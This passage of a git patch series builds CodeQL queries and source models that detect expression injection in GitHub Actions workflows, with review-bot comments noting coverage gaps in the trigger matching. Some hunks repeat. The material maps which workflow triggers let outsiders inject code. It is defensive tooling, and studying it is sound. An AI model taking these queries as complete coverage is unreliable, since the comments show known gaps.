@@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 00000000000..20383f415c2 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea..21a0b479ef5 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
@@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", 
"output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e..9b6649892af 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml 
@@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45c..a6baf060c9d 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From 3aa4f7f1afc911f7ef871d2b3d22daea7ae2ac41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 0063/1267] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263..5037a55d632 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
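Review bot: The new condition in `CriticalExpressionInjection.ql` passes `getATriggerEvent()` straight into `hasTriggerEvent`, which looks the string up as a key under `on:`. `CompositeActionInputSource` returns `"*"`, and `sourceModel` rows can carry `*` in the trigger column (the `octo-org/source-repo` row in PATCH 0060 does), so those sources can never satisfy the check and silently drop out of the critical query. If `*` is meant as "any trigger", handle it explicitly, for example `exists(string t | t = source.getNode().(RemoteFlowSource).getATriggerEvent() | t = "*" or wf.hasTriggerEvent(t))` with `wf` bound to the enclosing workflow. A QLDoc line on the abstract `getATriggerEvent()` in `FlowSources.qll` stating that convention would help model authors.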
@@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } 
@@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 00000000000..624bd32e45c --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -0,0 +1,47 @@
+/**
+ * @name Expression injection in Actions
+ * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
+ * user to inject code into the GitHub action.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/critical-expression-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class ExpressionInjectionSink extends DataFlow::Node {
+ ExpressionInjectionSink() {
+ exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or
+ externallyDefinedSink(this, "expression-injection")
+ }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where
+ MyFlow::flowPath(source, sink) and
+ source
+ .getNode()
+ .asExpr()
+ .(Statement)
+ .getEnclosingWorkflowStmt()
+ .hasTriggerEvent("pull_request_target")
+select sink.getNode(), source, sink,
+ "Potential expression injection, which may be controlled by an external user."
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 99779d6cc90..c34fcb74bbc 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -4,7 +4,7 @@
 * user to inject code into the GitHub action.
 * @kind path-problem
 * @problem.severity warning
- * @security-severity 9.3
+ * @security-severity 5.0
 * @precision high
 * @id actions/expression-injection
 * @tags actions
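Review bot: The `where` clause of `CriticalExpressionInjection.ql` hard-codes `"pull_request_target"` while the same commit lowers `ExpressionInjection.ql` to `@security-severity 5.0`, so an injection in a workflow started by another event that runs with repository privileges on outsider-supplied data (for example `issue_comment` or `workflow_run`) is now surfaced only at the lower score. Workflows that do match are presumably reported by both queries, since nothing visible in the general query excludes them (its body is outside the hunk). The `@description` also lists `run:` and `script:` as contexts although they are the sinks; wording such as "Using user-controlled GitHub Actions contexts in `run:` or `script:` blocks" would read correctly.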
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac0..8271f93d857 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From ea29a09fd7ea8ccc8a1c87e7b5914a54333312eb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 0064/1267] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d632..2e93187b6bf 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** 
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb5572..594b6017729 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580..0e82498bfc1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } 
@@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** 
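Review bot: The trigger lists in `EventSource` form an allow-list with no comment saying which events were left out and why. For instance `pull_request` is absent from the pull-request branch (presumably deliberate), and as far as this hunk shows a reusable workflow whose `on:` is `workflow_call` cannot match any of these names even when its caller is privileged, so sources inside it are reported only by the lower-severity query. A comment above the disjunction, such as `// Only events that run in the base-repository context; workflow_call callers are not resolved`, would make that coverage gap visible to maintainers. The single-element set literals (`trigger = ["gollum"]`) can be plain string comparisons.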
@@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index e1a3479cfc0..2d77b347348 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -218,7 +218,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) 
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26d..34cb56a01ad 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826..6fefec9a4f8 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5..d7cbde25b88 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml 
@@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 00000000000..20383f415c2 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea..21a0b479ef5 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
@@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", 
"output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e..9b6649892af 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml 
@@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45c..a6baf060c9d 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From e1d6c7dac413e8d0b6564678998613797097468c Mon Sep 17 00:00:00 2001 
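Review bot: `hasTriggerEvent` is a key lookup under `on:`, so the `"*"` that `CompositeActionInputSource.getATriggerEvent()` returns elsewhere in this commit can never match in the changed line of `CriticalExpressionInjection.ql`, and a source that is not inside any `WorkflowStmt` has no `getEnclosingWorkflowStmt()` result to begin with. Sources of that kind therefore drop out of this query without any indication. If that is intended, state it in a comment next to the `where` clause (which starts outside the hunk); otherwise bind the event to a variable and accept the wildcard explicitly before calling `hasTriggerEvent`.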
From: jorgectf Date: Wed, 21 Feb 2024 15:29:27 +0100 Subject: [PATCH 0065/1267] Add some steps --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 6 ++++++ ql/lib/ext/android-actions_setup-android.model.yml | 6 ++++++ .../ext/apple-actions_import-codesign-certs.model.yml | 6 ++++++ .../ashley-taylor_read-json-property-action.model.yml | 6 ++++++ .../ext/ashley-taylor_regex-property-action.model.yml | 7 +++++++ ql/lib/ext/aszc_change-string-case-action.model.yml | 8 ++++++++ .../aws-actions_configure-aws-credentials.model.yml | 11 +++++++++++ ql/lib/ext/bobheadxi_deployments.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 6 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 ++++++ ql/lib/ext/coursier_cache-action.model.yml | 6 ++++++ ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 6 ++++++ ql/lib/ext/csexton_release-asset-action.model.yml | 6 ++++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 6 ++++++ ql/lib/ext/frabert_replace-string-action.model.yml | 4 ++-- .../ext/franzdiebold_github-env-vars-action.model.yml | 7 +++++++ ql/lib/ext/game-ci_unity-test-runner.model.yml | 6 ++++++ ql/lib/ext/getsentry_action-release.model.yml | 7 +++++++ ql/lib/ext/github_codeql-action.model.yml | 6 ++++++ ql/lib/ext/gradle_gradle-build-action.model.yml | 8 ++++++++ ql/lib/ext/haya14busa_action-cond.model.yml | 7 +++++++ ql/lib/ext/hexlet_project-action.model.yml | 6 ++++++ ql/lib/ext/jsdaniell_create-json.model.yml | 8 ++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 6 ++++++ .../ext/khan_pull-request-comment-trigger.model.yml | 7 +++++++ ...ner_circleci-artifacts-redirector-action.model.yml | 6 ++++++ .../mad9000_actions-find-and-replace-string.model.yml | 4 ++-- ql/lib/ext/mattdavis0351_actions.model.yml | 7 +++++++ 